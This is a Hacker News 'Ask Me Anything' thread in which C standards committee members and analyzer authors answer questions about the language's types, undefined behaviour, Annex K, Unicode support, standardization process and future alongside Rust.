We can do it today with awkward code, sometimes involving hacks that are outside the C language. Implementations vary by how much they hide what is going on. When I implemented libproc.so for Linux, I made two implementations. The high-performance one used a perfect hash table that was generated by gperf and then hand-edited. Name look-up would do the hash, index into an array of structs, compare the name for a match, and then use gcc's computed goto extension to jump to code that would handle the struct member. Had I not been also parsing the data in various distinct ways, I might have used an offsetof() macro to let generic code fill in the struct fields. The other implementation I made, with lower performance, used bsearch on a sorted array.

Dynamically defined struct members are also useful, but even slower and with even more overhead. Again though, I don't think that other code would be affected beyond the growth of the compiler's libgcc equivalent.

Seeing what I just wrote above, the computed goto extension is more important. It's great for any kind of table look-up that needs code to run. Emulators use it a lot, and would use it much more if it were in the C standard.


Just FYI -- there are macros for the fixed-length types, e.g.:

    printf("U32: %" PRIu23 ", U64: " PRId64, (uint32_t)1, (int64_t)2);
Perhaps not as handy as %u32 or %s64, but it's here.


Yeah, and the issue is with exactly those macros. They make writing code really damn annoying; they rely on C constant string concatenation, which breaks the flow quite a lot.


Which is why I usually convert to intmax_t or uintmax_t, or to some type that I know is wide enough:

    uint64_t foo = ...;
    printf("foo = %ju\n", (uintmax_t)foo);
    /* OR */
    printf("foo = %llu\n", (unsigned long long)foo);


I think what emilfihlman means is those macros are hard to remember and clumsy to use - which you might agree with when I point out you made two mistakes in two usages :-p


As experts, where do you see C going? In particular, given the many languages now out there built on decades of learnings from C, where will C have unique strengths? What projects starting today and hoping to run for 20 years should definitely pick C?


I don't really see C going anywhere. It's not going away, and it's not going to evolve into Java. It's going to remain especially useful for memory constrained and performance critical applications such as IoT and embedded.


That sounds reasonable, but the resource-constrained space seems to me to be an ever-shrinking share of the field. So is it fair to say you see C becoming a specialist niche language going forward?


Thank you for taking time to take questions!

Have you ever considered or will you consider deprecating char, int, long, (s)size_t, float, double, etc. in favour of specific-length types?

Will you ever add / have you considered adding [su]\d+ and f\d+ as synonyms for those mentioned stdint.h?

Since char is signed on most platforms (ARM EABI being an exception, and even there it's really just a matter of compile-time flags), will you ever drop char's ability to be either and just say it's signed, the way int is?

Will you ever define / have you considered defining signed overflow behaviour?


I don't think we'll ever deprecate char, int, long, float, double, or size_t. ssize_t is not part of the C Standard, and hopefully never will be as it is a bit of an abomination. The main driver behind the evolution of the C Standard is not to break existing code written in C, because the world largely runs on C programs.

C does provide fixed-width types like uint8_t, uint16_t, uint32_t, and uint64_t. These are optional types because they can't be provided by implementations that don't have the appropriate word sizes. We also have required types such as

uint_least8_t, uint_least16_t, uint_least32_t, uint_least64_t


Those types should not be optional. CHAR_BIT needs to be 8. It is clearly possible to implement the types even on a 6502 or Alpha. From the early days of pre-ANSI C, the language supported types for which the hardware did not have appropriate word sizes. There was a 32-bit long on the 16-bit PDP-11 hardware.

I would go beyond that, requiring all sizes that are a multiple of 8 bits from 8-bit through 512-bit. This better supports cryptographic keys and vector registers.


> CHAR_BIT needs to be 8.

Why?


Everything breaks if it isn't.

I was on an OS development team in the 1990s. We were using the SHARC DSP, which was naturally a word-addressed chip. Endianness didn't exist in hardware, since everything was whatever size (32, 40, or 48 bits) you had on the other end of the bus. Adding 1 to a hardware pointer would move by 1 bus width. The chip vendor thought that CHAR_BIT could be 32 and sizeof(long) could be 1.

We couldn't ship it that way. Customers wanted to run real-world source code and they wanted to employ normal software developers. We hacked up the compiler to rotate data addresses by 2 bits so that we could make CHAR_BIT equal to 8.

That was the 1990s, with an audience of embedded RTOS developers who were willing to put up with almost anything for performance. People are even less forgiving today. If strangely sized char couldn't be a viable product back in the 1990s, it has no chance today. It's dead. CHAR_BIT is 8 and will forever be so.


This was a really interesting and enlightening comment and a small story! Thank you!


>The main driver behind the evolution of the C Standard is not to break existing code written in C, because the world largely runs on C programs.

If not deprecate, then at least make fixed width types as equivalent members to them, ie all char based apis should accept s8 (typedef signed char s8) and all int based apis should accept s32.


Well, there are a number of problems with this proposal. For example, if your implementation defines int as a 16-bit type (which is permitted by the standard) and you pass an int32_t, the value you pass may be truncated if it is outside the range of the narrower type. When programming, it is best to match the type of the API of the function you are calling, for portability.


Dear god, is the precedence of the "&" operator ever going to be fixed?


I can't imagine it will ever be changed, since this would be a breaking change to the language.


I disagree that this would be a "breaking" change, as many people have already resorted to using extra (), and such a change might actually "fix" broken code that makes the reasonable assumption that things like == bind more tightly.

https://ericlippert.com/2020/02/27/hundred-year-mistakes/

    int x = 0, y = 1, z = 0;

    int r = (x & y) == z; // 1
    int s = x & (y == z); // 0
    int t = x & y == z;   // 0 UGH


If you're using parentheses, as has been recommended for decades, there is no problem. Otherwise, it is likely that such a change would adversely impact previously working code. There just isn't a pressing need to change it.


Besides the fact that it's unintuitive and could lead to subtle, hard-to-find bugs?

It seems to me that C would benefit greatly from ironing out its many inconsistencies, and that's exactly the kind of thing people expect in new revisions of the language.

Also, I don't see how it would impact previously working code when compilers already allow selecting between versions of the language a la C99, C2x, etc. Users could just avoid the new version if they don't feel like changing.


I don't think most users of C want things changing underfoot. Keeping track of all the version combinations is infeasible, especially when you consider that an app and its library packages are likely to have been developed and tested for a variety of environments. To the extent that existing correct code has to be scanned and revised when a new compiler release comes out, one of the primary goals of standardization has failed.


I disagree with your view of standardization: restricting changes to additions to the runtime seems pointless, as users could easily use other (often more optimized) libraries.

But, I do see the benefit of having a language "frozen in time" which never really changes and can be mastered painlessly without having to refresh on new versions. Perhaps C is special/sacred in this regard.


Hello, just a quick note; I wanted to buy the book so I went to the website and when I picked my country as Canada it started giving me a strange list of provinces (definitely not Canadian) so I abandoned the process for now.


I've asked our Operations Manager to look into this issue. Thanks for bringing this to our attention. We'll get it sorted out. Please email info@nostarch.com so that they can help troubleshoot.


I'll pass this on to the publisher....


Here is a library suggestion: a "m" mode for fopen.

"m" is the same as "w", but does not truncate the file. In POSIX terms, it doesn't add O_TRUNC to the flags.

There is "r+", of course; but "r+" requires that the file exists already. In POSIX terms, "r+" does not include the O_CREAT flag.

fopen("foo", "m") creates the file if it does not exist, and opens it for writing. The stream is positioned at the beginning of the file without truncating it.

We can sort of emulate it with fopen("foo", "a"), then fclose, then open with "r+".


Why is the struct tm* returned by localtime() not thread-local like errno and other similar variables are (at least in implementations)? Do you have any plans to improve calendar support for practical uses?


Both questions would get better answers from a panel of experts on POSIX (which could include members of the POSIX standardization committee).

For the first one, I can attempt a guess: maybe it was feared that making the result of localtime thread-local would break some programs? You could build such a program on purpose, although I am not clear how frequently one would write one by accident.

Anyway, localtime_r is the function that one should use if one is concerned by thread-safety. A more likely answer is that no Unix implementation bothered to fix localtime because the proper fix was for programs to call localtime_r.


Hi, I've been a dev for 20 years and I love C. C is my second language after assembler. Those were the good days, with Turbo C, a 20 MB hard drive, and an 8086, without IT marketing and viruses. I'm working on a real-time reverse-debugger for a new programming platform. It's possible to debug C code and prevent NULL and memory exceptions. I created my own language based on C, removed all keywords, and it works perfectly. I want to make a gcc backend for my programming language so that all its features will be available to any C program.

How can I find help for this?


I really like the relative simplicity of C compared to C++ and recently wrote a project in C, but eventually rewrote it in C++ for just a few seemingly trivial reasons that nonetheless were important time savers. I'd love to know if the C standard, as can run on GPUs also, will ever evolve to offer:

1) namespaces, so function names don't need to be 30 characters to avoid naming collision

2) guaranteed copy elision or RVO -- provides greater confidence for common idioms and expressivity compared to passing out parameters


Since 1999, a lot of undefined behavior has been added to the language to improve compilers’ ability to optimize. For example, pointer aliasing rules. How have you measured the benefit?


What is your vision of C, its future and its past? What was it supposed to become, and did it become that thing? What is it now? What will it evolve into in the near and far future?


The C charter and the C committee's job is to standardize existing practice. That means codifying features that emerge as successful in multiple implementations (compilers or libraries), and that are in the overall spirit of the language.


Out of curiosity, if there was anything you could change about C, and not have to worry about breaking existing code or any other practical concern, what would it be, and why?


Back from lunch. Any West Coasters?


When deciding on standardized behavior for C operations or data representation that may favor some hardware over others [1], who argues the side of the various hardware vendors, if they have no members on the standardization committee?

Is it fair to assume that hardware-related decisions occur in an environment where members who are sponsored by vendors argue their employer's case, rather than a neutral one?

---

[1] E.g., because some hardware's behavior may more naturally implement the operation.


> When deciding on standardized behavior for C operations or data representation that may favor some hardware over others [1], who argues the side of the various hardware vendors, if they have no members on the standardization committee?

The C committee has a number of implementation vendors on it (GCC, Clang, IBM, Intel, sdcc, etc) and these folks do a good job of speaking up about the hardware they have to support (and in some cases, they're also the hardware vendor). If needed, we will also research hardware from vendors who have no active representation on the committee, but this is usually for more broad changes like "can we require 2's complement?".

> Is it fair to assume that hardware-related decisions occur in an environment where members who are sponsored by vendors argue their employers case, rather an a neutral one?

In my experience, the committee members typically do a good job of differentiating between "this is my opinion" and "this is my employer's opinion" during discussions where that matters. However, at the end of the day, each committee member is there representing some constituency (whether it's themselves or their company) and votes their own conscience.


Thanks for your quick and honest answer.


Is there a way to append to / extend a macro's value?

For example, I have an arbitrary number of includes, each of which declares a struct that needs to be listed later on.

  #define MOD_LIST // start with an empty list

  #include "mod/a.c"
  // MOD_LIST is: a,

  #include "mod/b.c"
  // MOD_LIST is: a,b,
  
  Module modules[] = {
    MOD_LIST
  };


Hi I took an amazing course in college that focused heavily on C. Do you have any recent examples of small side projects you’ve worked on using C?


How about a Sudoku solver? Send me a request via e-mail.


Doug, the email address in your account is private by default, but you can make it public by putting it in the About field of your profile at https://news.ycombinator.com/user?id=DougGwyn.

ender1235, if you don't see an email address there, email hn@ycombinator.com and I'll put you in touch.


Okay, check my About text. I'll soon remove it, to avoid getting a lot of spam.


Why not keep C a simple little language with fast compile times and delegate all "enhancements" (such as 'cleanup') to C++?


From reading all their comments up to now, my feeling is that's exactly their plan.

When asked, "Where do you think C is going?", one of them said, "I don't see it going anywhere." I took that as a good thing, meaning they're concerned about backward compatibility and compiler performance, and will only add features when there's wide consensus in implementations - which is a high enough hurdle to avoid the feature bloat of C++.

Overall, I felt the "conservatism" refreshing, to keep the language small.

On the other hand, there are several common feature requests I see in this thread that probably will never be part of the language, since it moves slow relative to other languages.


What is your favorite language other than C and why?


I answered a similar question in another thread: https://news.ycombinator.com/item?id=22866242


another proposal:

    _If, _Ifdef, _Ifndef
inside function macros

for example:

    #ifdef SOME_CONST
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... for SOME_CONST ... \
        ... common part continued ...
    #else
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... when SOME_CONST not defined ... \
        ... common part continued ...
    #endif
With _Ifdef, the above could be written like:

    #define WHATEVER(w, h, a, t, e, v, e, r) \
    ... common part ... \
    _Ifdef(SOME_CONST, \
        (... for SOME_CONST ...) , \
        (... when SOME_CONST is not defined ...)
    ) \
    ... common part continued ...
With these, one could also do:

    #define FACTORIAL(n) _If(n == 0, 1, (n) * FACTORIAL((n) - 1))
    int f = FACTORIAL(6);
turns into: int f = (6) * (5) * (4) * (3) * (2) * (1) * 1;

That would be very useful, I think. It might help with code duplication in function macros.

Maybe _Switch/_Case thereafter.


Why not write is like this:

    #ifdef SOME_CONST
    #define HAS_SOME_CONST \
        ... for SOME_CONST ...
    #else
    #define HAS_SOME_CONST \
        ... when SOME_CONST not defined ...
    #endif
    
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... HAS_SOME_CONST ... \
        ... common part continued ...


Modern C language features:

- Why no sized text strings?

- Why is there no hash data type?

- Where's the linked list?

- Why no package management as part of ecosystem?

What is the modern rationale?

Caveats:

- I'm not implying any need for object-orientation (OOP)

- I'm fully aware I can write these myself and can access third party libraries that have each laboriously implemented their own versions.

- I'm interested in why these are not native C constructs in 2020. I appreciate why not in 1980.


Thoughts on Gnome glib, gobject, vala etc?

I tend to use glib for my (academic) code for pretending C is a high-level language. It also seems to make up for implementation-dependent functions in C and many portability issues. Also, IMO, vala > C++.

My question is, really, are there any other tools for high-level C programming and do you know of any disadvantages of the Gnome stack?


I've been waiting for a book on C from No Starch Press, so I'm really excited for this one.

This might not be too deep a question on the C language in regards to this book, but I've been wondering, why did you decide to have an eldritch horror as the book's cover?


It's a longish story, but people do seem to like the cover. We started equating the idea of C == Sea, so we had some early drawings of the robot riding various undersea creatures including a giant squid. I thought that looked overly phallic, so I suggested the robot ride Cthulhu instead, an unofficial mascot of NCC Group.


I like how Cthulhu is shown as kind of a guide for the robot.

The C==Sea brings to mind the book Expert C Programming: Deep C Secrets.


Deep c secrets, a classic.


Wait, they put Cthulhu on the cover of a programming book? I'm buying it.


Has Annex K been axed yet, and if not, why not?


It has not. The C Committee has taken two votes on this, and in each case, the committee has been equally divided. Without a consensus to change the standard, the status quo wins.

Sounds like you don't care for Annex K. What don't you like about it?


I think my complaints are summed up nicely in some of your coauthors' report:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1967.htm

(1) runtime constraint handler callbacks are a terrible API.

(2) The additional boilerplate doesn't buy us anything — the user can still specify the wrong size.

(3) The Annex invents a feature out of whole cloth, rather than standardizing existing practices. There are no performant real-world implementations that anyone uses. Microsoft's similar functionality is non-standard.


Have you considered adding multiplexing capability to the standard? It would be great to have a directly portable one.


We would need a specific proposal and assurance that nearly all computers can efficiently provide that service. It is more likely in the POSIX standard.


Though it's interesting that threads were added to the standard. Perhaps they filled a niche that wasn't already well served, whereas multiplexing is already well covered by select/poll/epoll/kqueue/etc.; the pthread API is also perhaps harder to use.


I thought it would be best to standardize just a single thread, which should be the basic unit to be embedded in a good parallel-processing model. However, others prevailed.


What do you think about D language's mode to work as a better C alternative[0]? It seems to even do printf format validation. Can this be the future of C?

[0] https://dlang.org/spec/betterc.html


Not particular to the C language, but what are your opinions on build systems, particularly for the embedded space? There are a couple of vendor-specific embedded IDEs and toolchains, and having to glue together make/cmake files to support all of them can be a pain.


Robert's upcoming book has a survey of a few popular IDEs.


What does the presence or absence of __STDC_ISO_10646__ indicate exactly? I found this part of the C99 spec obscure.

For instance, the macOS clang environment does not define this symbol. Is their implementation of wchar_t or <wctype.h> lacking some aspect of Unicode support?


If that macro is defined, then wchar_t is able to represent every character from the Unicode required character set with the same value as the short code for that character. Which version of Unicode is supported is determined by the date value the macro expands to.

Clang defines that macro for some targets (like the Cloud ABI target), but not others. I'm not certain why the macro is not defined for macOS though (it might be worth a bug report to LLVM, as this could be a simple oversight).


Would the following be a correct way to determine whether there's a problem?

* First call setlocale(LC_CTYPE, "en_US.UTF-8")

* Next feed the UTF-8 string representation of every Unicode codepoint one at a time to mbstowcs() and ensure that the output for each is a wchar_t string of length one

* If all input codepoints numerically match the output wchar_t UTF-32 code units, then the implementation is officially good, and should define __STDC_ISO_10646__?


I think this is correct, assuming that locale is supported by the implementation and wchar_t is wide enough, but I am by no means an expert on character encodings.


Should work provided your wchar_t type is at least 21 bits wide.


Have any of you looked at the CHERI hardware architecture and fat capability pointers, broadly?


Has there been a survey to determine what percentage of known compilers support each C version, like C89, C99, C11? I've been sticking to C99 because I assumed later versions won't be widely adopted for a long time to come. Is this accurate?


There is a Web page I saw a few days ago that does that, probably findable by grepping Wikipedia. Unfortunately I forget its URL.


I frequently rely on reading and writing uninitialized struct padding in code that compare-and-swaps the underlying struct representation with some (up to 128-bit) integer.

I could use a union type, but that adds extra memory operations, and is finicky.

Is there a better way?


What's an example of a codebase where _Generic has had a notable positive impact?


Not necessarily a code base, but _Generic is what makes <tgmath.h> implementable for the type-generic math functions.


What is the difference between C objects (# "a region of data storage in the execution environment, the contents of which can represent values") and objects in C++, in terms of representation and usage?

# from Chp2 of Effective C


Are there any plans to add support for multiple register return values to C?


What are you asking for? Do you mean that if you return a small struct from a function, the fields are placed in registers instead of memory, if they can fit? This is up to the ABI, not the standard, to define, and some ABIs already do that.


None that I'm aware of.


How should I represent Unicode in memory?! UTF8? 16? 32bit integers? I keep hearing pros and cons of all the previous three. Is there a consensus? In cases where you don’t need a full blown Unicode lib.


A more chill question for you - What's your favourite string library?


Hi, I have two questions.

1) Are there any plans or discussions on having a subset/extension of C that is designed for formal verification? Much like SPARK with Ada.

2) Is there no plan to support GC? Even as an extension of C?


Tell me where I can get the C89 standard for free (pdf or other formats)


The last time I needed it, archive.org had a link to a PDF of it.

I couldn't find that again in one minutes, but here is the text version: http://web.archive.org/web/20030222051144/http://home.earthl...


Thanks


What prevents you from buying K&R?

A paper book is less likely to be lost, and K&R is a more affordable reference for C than ISO 9899.


This is a subjective question. From the array of tools in your belt, when do you personally/professionally reach for C, or maybe more interestingly, when do you not reach for C?


Since I do almost all my software development in a Unix environment, usually I check the toolbox to see if there is already a program that has nearly the functionality I want, and if so then I cobble together a shell script. Sometimes (as with the Sudoku solver) it will be necessary to build a new component, and for that I usually use C since I am comfortable and experienced with it. (Also, if coded in Standard C, odds are that I can install it on whatever platform I need, with little or no adaptation.)


I'm trying to learn C during this quarantine times. I'm looking for good beginner-friendly opensource projects to learn from. Can you please suggest some repositories to look into?


(obviously, i'm not one of the panel members, just chiming in.)

if you're interested in looking at how C can be used in embedded realtime operating systems, i recommend diving into:

https://github.com/ARMmbed/littlefs

(i'm not affiliated.)

it's a lean, logging flash filesystem implementation and i recommend it because the research, rationales, documentation, organization, codebase, test harness, and public API ergonomics all impressed me a lot. it was written for the mbed OS, but it is so well designed that i could integrate it into any realtime OS without too much trouble. and the documentation is thorough enough that after skimming the wikipedia article for filesystems, and maybe an article on how flash chips read and write data, you'll be able to work your way through it. i learned a lot by reading through that repository.


A ton of comments here talk about arrays and basic preconditions. See frama-c.com. Even in C++, where encapsulation helps, class/function contracts and unit testing are a must.


In C89 is there a portable way to figure out the alignment requirement for a struct, to be able to, say, store it after the NUL terminator in the same allocation as a C string?


I'm not sure what your requirement is. Usually things work out if you're careful not to assume any specific value for alignment etc. It may mean a few unused bytes here and there, but keeping things simple and portable often pays off.


Being able to know your alignments is VERY important for a lot of network implementations. They are all defined by the ABIs, but it's very annoying that the standard keeps treating alignment as unknowable, when in fact it's impossible to implement an ABI without defining it. One of the reasons I stick to C89.


Note that the ABIs cover endianness as well as value range and/or object widths. In general, one needs to have explicit marshaling and unmarshaling functions to map from network octet array and C internal data representation. Failure to get this right is (or used to be) a common bug for code developed and tested on too few architectures.


Sure, it won't be portable between arbitrary architectures, but a lot of the time you know you will be on a little-endian platform where types are aligned to their sizeofs. That covers a lot of ground, and the performance gains you get from optimizing with this in mind are significant. There is value in C being portable, but there is also huge value in being able to write non-portable code that takes advantage of what you know about the platform. C needs to acknowledge that that is a legitimate use case.


Do you think that static analysis is a valuable tool for security research? Do you recommend static analysis software to a single developer with a limited budget or an amateur?


Yes, both :) There are a few in the public domain that might be helpful to experiment with. Clang has had a static analyzer for a while and GCC 10 adds one as well (and the maintainer is looking for help with implementing checkers, so that's a good way to gain experience with writing one).


would love to see a couple of detailed comments on this directly as well, I know that one of yall is a maintainer of an analyzer, maybe just some general discussion on beginning to learn C while at the same time incorporating a static analyzer and what that would look like.


What did you think of the Stuxnet code from your perspective? Was it clear who made it from the start, and what it's purpose was? (Iran or China vs India?). Thanks.


About time someone advocated for code in lower level styles of programming. Hope it goes well!

Anyway, here's some questions:

- What kind of programs would you say C is a good fit for?

- There is some catching up to do for C. Is there a roadmap for C improvement, or even a recommendation of C++ things that fit somewhat in the style/philosophy of C? For example, I'd recommend not using the C++ smart pointers stuff, while still using C++ threads and lambdas.

Also, you should include programmers from other fields in your committee. Game (engine) developers, HFT programmers are used to lower level styles of coding and align with your perspective.


When do you think we will get an update to C11 or more recent version of C to MISRA? Do you all have any influence on "Safety Critical C" standards?


The MISRA committee is a separate organization from the C standards committee, but there is overlap between the two groups and an official liaison process for the committees to collaborate. So there's a bit of bidirectional influence between the two groups.

I am not on the MISRA committee, but I believe they talk a bit about their public roadmap in this video: https://vimeo.com/190304951


What are your recommendations on going about learning the C language properly? And How to go about learning all levels of abstraction of the language?


Other than these experts, what kind of companies do C developers work at? What does the compensation look like compared to doing web development?


I do not actually develop in C (other than short examples to feed the C analyzer that I work on, which is not written in C) but our customers do employ plenty of C developers. These customers are developing embedded software that reads inputs from sensors, processes them, and sends the final results of the computations to actuators, in fields such as IoT, aeronautics, rail, space, nuclear energy production, autonomous transportation, …

The list is very much biased by the sort of analyzer we provide. There are certainly plenty of non-embedded codebases in C and of developers paid to maintain and extend them, it's just that we currently do not work with them as much.

I do not know about whether the compensation is better or worse than for other technologies.


I want this feature in the standard.

If any memory block allocated using malloc() / calloc() / realloc() has not been free()'d by the end of the program, it would be free()'d automatically.

One can easily do it with keeping a linked list and using atexit(), but, can it be added to the standard?

A general question: will any feature that is "easy" to implement in pure C, like arrays knowing their own length or Pascal strings, NOT be allowed into the C standard even if it is widely used, maybe almost everywhere?


The operating system handles this for you at process termination. Lots of “one shot” programs count on this (and, e.g., on file descriptors being automatically closed).


So, should I not care about that so much, and write programs without free()'ing allocated memory?

If OSes do that, why not standardize that in C?


CAN I HAZ UNNAMED UNUSED PARAM

   void callback(int x, void *) // VOID STAR UNUZED, SO ANON
   {
      foo(x);
   }


Why is there a second argument which is not used?


It could be for function pointer type compatibility.

There is an array of pointers, or there is a callback interface, or something like that. The type is set in stone.


To match an API where it is sometimes used.


Know it's not exactly related to what you do. But do you have some recommendations of books/online classes to learn C?


How accurate, relevant, and useful today is http://c-faq.com ?


It's a bit dated (it hasn't been updated since 2005), but apart from that I'll say that parts of it are excellent.

In particular, section 6 is the best resource I know of for explaining the often counterintuitive relationship between arrays and pointers.


Why is shifting by a negative amount undefined?


Because people want `c = a << b` to compile into `shl c, a, b` and C89 made the giant mistake of calling it ‘undefined’ instead of ‘implementation-defined, possibly fatal’.


How do modern C developers approach writing secure network code in C? Are there any tools for verifying network code?


1. What is the easiest way to build cross-platform (native) GUI with C?

2. Why is it harder to find LGPL-licensed libraries to access Windows directories over the network (like jcifs or pysmb), and libraries in general, when you need to keep most of your source closed in order to sell small software to businesses?

3. If you needed to combo C with another language to do everything you need to do forever and never look back what other language would that be?


To what extent does compiler complexity factor into your thinking about the evolution of C?

Thanks for this!


When the committee considers proposals, we do consider the implementation burden of the proposal as part of the feature. If parts of the proposal would be an undue burden for an implementation, the committee may request modifications to the proposal, or justification as to why the burden is necessary.


Thanks. Do you have an example of a proposal that the committee considered an undue burden for an implementation but was otherwise sound?


Not off the top of my head, but as an example along similar lines, when talking about whether we could realistically specify two's complement integer representations for C2x, we had to determine whether this would require an implementation to emulate two's complement in order to continue to support C. Such emulation might have been too much of a burden for an implementation's users to bear for performance reasons and could have been a reason to not progress the proposal.


Can/should the C language be extended to better support vector processors and GPGPU?


Quite a few new languages generate C code for the “backend” of their compiler. For example ATS and the ZZ language.

This helps bring these languages to embedded targets with closed toolchains (with an existing C compiler).

Will there be developments to use a subset of C as a “portable assembly” in a standard way? Like there is WebAssembly for JavaScript.


That doesn't seem likely. There have been no proposals for anything like it and there is a general resistance to subsetting either C or C++ (the exception being making support for new features optional).


How and why will C combat Rust?


In my opinion, the two languages are going to co-exist for a long time. C has billions of lines of legacy software written in it… In recent news, COBOL developers were sought after in order to update existing COBOL software, so the same thing will happen with C, perhaps to the end of humanity (I have become pessimistic as to humanity's future).

There are pieces of software that should be given priority for a rewrite in Rust, but most of C software is never going to be rewritten, because there is simply too much of it.

Therefore, even if C did not have any advantage of its own over Rust, there would still be legacy software to maintain and to extend.

The advantages of C include that sometimes, an embedded processor with a proprietary instruction set is provided by the chipmaker with its own C compiler, which is the only compiler supporting the instruction set; that C is still currently used to write the runtimes of higher-level languages (I'm familiar with OCaml, but it isn't too much of a stretch to imagine that the runtimes of Python, Haskell,… are also written in C).


> In my opinion, the two languages are going to co-exist for a long time.

It goes deeper than that, in a couple of places Rust depends on the C standard: the fixed-layout `#[repr(C)]` structs (without that attribute, the compiler is free to reorder the struct fields; with that attribute, it's laid out the way C would do it), and the `extern "C"` function call ABI. The way to call any other language from Rust, or Rust from any other language, is to go through `extern "C"` functions passing `#[repr(C)]` structs. So even if the C language dies one day, parts of it will live in Rust forever (or as long as the Rust language lives).


There's tons of legacy C around, we have to maintain it, it's not ideal unless you're on some niche platform, lots of stuff should probably be written in a better language . . .

I sincerely hope this is not the general attitude of the standards committee. Some of us actually prefer C, and would like to see the language continue to flourish.


Note that among the C experts participating in this AMA, I am not one who is in the standardization committee. At 14:59 EDT, just before the AMA was posted, we were joking between ourselves about me having to post this disclaimer but I guess there was a hidden truth in the joke.


C is a pretty well established language, so this question should probably be asked the other way around. C was primarily designed to compete with FORTRAN.


Rust has a package manager while C and C++ don't (as far as I know). This alone makes Rust more attractive for some projects. I hope C and C++ get one.


How to become a compiler engineer if you don't have a degree in CS?


What GNU C extensions do you think ISO WG14 would more readily accept?


will we ever see compile time programming in C like constexpr in C++?


pascal_cuoq - Pascal Cuoq is the Chief Scientist at TrustInSoft and co-inventor of the Frama-C technology

This looks to be a hell of a good toolchain. I've been playing with it as of yesterday.


Any chance of getting something like Frama-C officially blessed?


Do you think object oriented languages are better than C to develop GUI-based cross-platform programs?

The licenses of the majority of third-party libraries available for C are GPL; do you think this makes it harder to reuse code when selling software?


Any chance that we could have an STL equivalent in C? Of course, with templates and other features absent, it won't be as generic as C++'s. However, having even something close to the STL would help in the long run. Thanks!


There is always a chance. We would need to see a proposal based on experience with an existing implementation.


Has there been consideration of async/await semantics?


Is memset(malloc(0), 0, 0) undefined behavior?


Let's assume the types have been corrected. malloc((size_t)0) behavior is defined by the implementation; there are two choices: (a) always returns a null pointer; or (b) acts like malloc((size_t)1) which can allocate or fail, and if it allocates then the program shall not try to reference anything through the returned non-null pointer. Now, memset itself is required (among other things) to be given as its first argument a valid pointer to a byte array. In particular, it shall not be a null pointer. Tracking through the conformance requirements, if the malloc call returns a null pointer then the behavior is undefined. Thus, you should not program like this.


What observable difference is there between malloc(0) and malloc((size_t)0)?


None.


I agree but he said the types needed to be corrected. As far as I know the types were already correct.


The argument "0" is not automatically converted to the right type unless there is a prototype in scope. It isn't as important in this case because it is highly likely that the appropriate prototype has been #included, but it is a bigger deal if we're dealing with arguments for a variadic function. Anyway, it's good to be reminded what the declared types are.


Are you serious? Of course the question comes with the reasonable assumption that the proper declaration has been made especially since it’s a well known standard function. Additionally memset() is not a variadic function.

You said the types were corrected, you didn’t say you were reminding about the declaration types. The types were correct from the start.


Something in the works for Async & Await?


What is your favourite design pattern?


What do you think about Web Assembly?


can we get compile time constant variables? something cleaner than enums and defines


is there no way to make C "memory-safe" during compilation?


There are a bunch of research projects that did just that. And even just compiling with address sanitizer makes it "memory-safe" to a significant degree.


can you link any to check out?


In a time of Rust and Golang, how is C still relevant? (Sincere question)


There are millions of lines of C code that aren't going anywhere, and still many platforms that those languages don't support.


Some simple instructions about how to use a thread for conversation would be appreciated. Thanks!


There are very few formatting options when writing posts, for better or for worse: https://news.ycombinator.com/formatdoc


Nothing to it! Just hit the reply button on comments you want to respond to. You can also upvote anything you like by clicking on the up arrow to the left of the comment.


Okay, is there a starting thread for today's C Experts panel? I miss the old net newsgroups.


The thread is https://news.ycombinator.com/item?id=22865357, which is the page you've been posting to. It's now listed on the front page of the forum, https://news.ycombinator.com/, which is a list of the stories people have upvoted today.

You're not the only person who misses the old newsgroups! The format that Hacker News uses is one that became sort of standard on the web in the early 2000s. It works differently than usenet did, but you get threaded comments in the sense that replies are nested under the posts they're replying to.


Hello, I coded in C as a high schooler. Now, 16 years later, I have to code C again semiprofessionally after a very long break.

Big question: how does somebody self-schooled in C start programming at a high professional level? Is there a way to cut corners, without having to go through 10+ years of trial and error to gain experience?

Anything for somebody ready to sit, study, and practice for a few hours a day?


There was a nice discussion recently https://news.ycombinator.com/item?id=22519876


I'm in a similar situation as the parent comment, wanting to re-learn C after more than a decade (or two). Thanks for the link to a recent discussion! For the parent, here are some of the recommended books:

Head First C - Griffiths and Griffiths

Expert C Programming: Deep C Secrets - Peter van der Linden

Modern C - Jens Gustedt

C Programming: A Modern Approach - K. N. King

21st Century C: C Tips from the New School - Ben Klemens

Understanding and Using C Pointers - Richard Reese

C Interfaces and Implementations: Techniques for Creating Reusable Software - David R. Hanson

The Standard C Library - P. J. Plauger


Compilers are much more helpful now. Better diagnostics, more options for warnings.


Hey guys,

How likely would the standard be to accept a proposal to add compile time reflection to the preprocessor, or even adopt C++'s constexpr?

My use case is creating a global array in a header from static compound literals in multiple source files at compile time, and outside of some crazy clang-tblgen type solution, or very platform specific linker hacks, it's completely unsupported by C.


How much UB does your own code contain, folks (and what practices do you follow to avoid it)?

Cheers from the shadowland :)


Anybody know where Dan Pop went and what he's up to these days?


[flagged]


Please don't do this here.


Is it worth it to learn C in 2020? Will it still be a prominent language for systems programming in the future?


Yes.

- Languages like Rust will gain more mindshare over the next decade, and be used in more and more new projects, but there are billions of lines of existing code in C, and those aren't going away.

- Hardware architects, for better or worse, largely think about software in terms of [a somewhat dated and idealized mental model of] C. So if you want to be able to converse with architects (which anyone doing systems programming should want to do), you need to have some basic fluency with C.


I believe C will continue to be used as a lingua franca even after no one uses it to write software, and we're decades from even that point.

You need to know enough C to interface with the OS, and enough C to talk about memory layout, memory management, dynamic libraries, ABI, etc.

Most higher language runtimes need C, even with a self hosting compiler. Not being able to work on the C parts is limiting.

You also need to know enough assembly to be able to understand what the compiler did with your own code, even if you never write assembly yourself. Not being able to compare the disassembly to the high-level language to understand why it doesn't work (or is an order of magnitude slower than expected) is limiting.


C also has renewed interest around IoT programming and mobile devices


How do you join three float values into a comma separated string, and then split it again?


Not sure what you mean but would

  char buf[64];  /* enough space for three formatted floats */
  snprintf(buf, sizeof(buf), "%f,%f,%f", your, three, values);
  sscanf(buf, "%f,%f,%f", &your, &three, &values);
Do the job?


I think that the GP was making a commentary on the sorry state of locale handling in C.

You need to first store the current locale, change the locale to one that doesn't use a comma as the decimal point, perform the above, and set the locale back. Plus, there's no threadsafe way to do this, since the locale is process-wide.


Why is the learning curve for C still so high?

* Why can't the learning curve be solved using tools?

